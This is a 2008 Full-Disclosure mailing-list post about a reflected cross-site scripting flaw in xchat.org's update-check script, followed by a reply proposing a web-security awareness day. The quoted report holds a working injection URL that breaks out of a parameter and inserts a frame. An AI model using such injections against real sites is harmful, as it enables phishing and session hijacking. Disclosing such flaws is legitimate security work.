[Full-disclosure] XSS in XChat.org
n3td3v
xploitable at gmail.com
Sat Apr 19 17:00:11 BST 2008
On Sat, Apr 19, 2008 at 4:06 AM, Steve Cooperman <worried at gmail.com> wrote:
> http://xchat.org/cgi-bin/checkupdate.pl?version=2.8.8%22%3E%3Cframe%20src=%22http://youtube.com/watch?v=oHg5SJYRHA0
>
>
>
> --
> Love,
> Steve Cooperman
I've noticed an increase in web application stuff on the list since April 15th.
Please only post these on May 1st...
it will look better if the list is full of xss for one day...and send
out a bigger message to the powers that be who don't take web
application security seriously enough.
Btw, I see what you did there with the e-mail address, nice.
All the best,
n3td3v
Web Application Security Awareness Day
http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061507.html
Full-Disclosure is hosted and sponsored by Secunia.